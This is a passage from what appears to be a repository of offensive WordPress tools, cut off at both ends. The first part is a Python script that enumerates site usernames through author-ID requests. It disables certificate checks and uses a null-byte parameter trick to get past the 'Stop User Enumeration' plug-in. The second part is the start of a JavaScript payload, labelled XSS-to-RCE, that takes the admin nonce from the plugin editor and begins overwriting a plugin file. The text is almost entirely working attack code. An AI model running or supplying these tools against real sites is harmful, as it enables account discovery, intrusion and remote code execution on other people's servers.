Error: "+str(e) 18 | print "[*] Make sure you have the following Python modules installed:\n\tbs4, urllib2, requests, argparse, ssl" 19 | exit(0) 20 | 21 | parser = argparse.ArgumentParser(description="WordPress user enumeration even if 'Stop User Enumeration' plug-in is installed") 22 | parser.add_argument('-t','--target', help='WordPress target', required=True) 23 | parser.add_argument('-s','--start', help='Author start number value', required=True, type=int) 24 | parser.add_argument('-e','--end', help='Author end number value', required=True, type=int) 25 | parser.add_argument('-o','--outfile', help='Save output in file') 26 | parser.add_argument('-v','--verbose', help='Show verbose message', action='store_const', const=True) 27 | args = parser.parse_args() 28 | target = args.target.encode('utf-8') 29 | 30 | if target.endswith("/"): 31 | target = target[:-1] 32 | 33 | if hasattr(ssl, '_create_unverified_context'): 34 | ssl._create_default_https_context = ssl._create_unverified_context 35 | 36 | print "[*] Started" 37 | try: 38 | requests.packages.urllib3.disable_warnings() 39 | except: 40 | pass 41 | for i in range(int(args.start),int(args.end)+1): 42 | try: 43 | target_url = target+"/?author="+str(i) 44 | if args.verbose: 45 | print "[-] Trying: " + target_url 46 | r = requests.get(target_url, verify=False) 47 | sc = r.status_code 48 | if sc==500: 49 | target_url = target+"/?a=b&author%00="+str(i) 50 | if args.verbose: 51 | print "[-] Trying: " + target+"/?a=b&author%00="+str(i) 52 | r = requests.get(target_url, verify=False) 53 | sc = r.status_code 54 | if sc != 404 and sc != 500 and sc != 403: 55 | html = urllib2.urlopen(target_url) 56 | soup = BeautifulSoup(html.read(), "lxml") 57 | tag = soup.body 58 | uname = (tag['class'][2]).replace("author-","") 59 | #print str(i) + " : " + str(sc) 60 | print str(i) + " : " + str(uname) 61 | if args.outfile: 62 | f = open(args.outfile, "a") 63 | f.write(str(i) + " : " + str(uname) + "\n") 64 | f.close() 65 | except 
Exception,e: 66 | #print "Exception occurred" 67 | print str(e) 68 | print "[*] Completed" 69 | -------------------------------------------------------------------------------- /wordpress/wp_xss2rce.js: -------------------------------------------------------------------------------- 1 | //Source: https://twitter.com/brutelogic 2 | 3 | x=new XMLHttpRequest() 4 | p='/wp-admin/plugin-editor.php?' 5 | f='file=akismet/index.php' 6 | x.open('GET',p+f,0) 7 | x.send() 8 | $='_wpnonce='+/ce" value="([^"]*?)"/.exec(x.responseText)[1]+'&newcontent=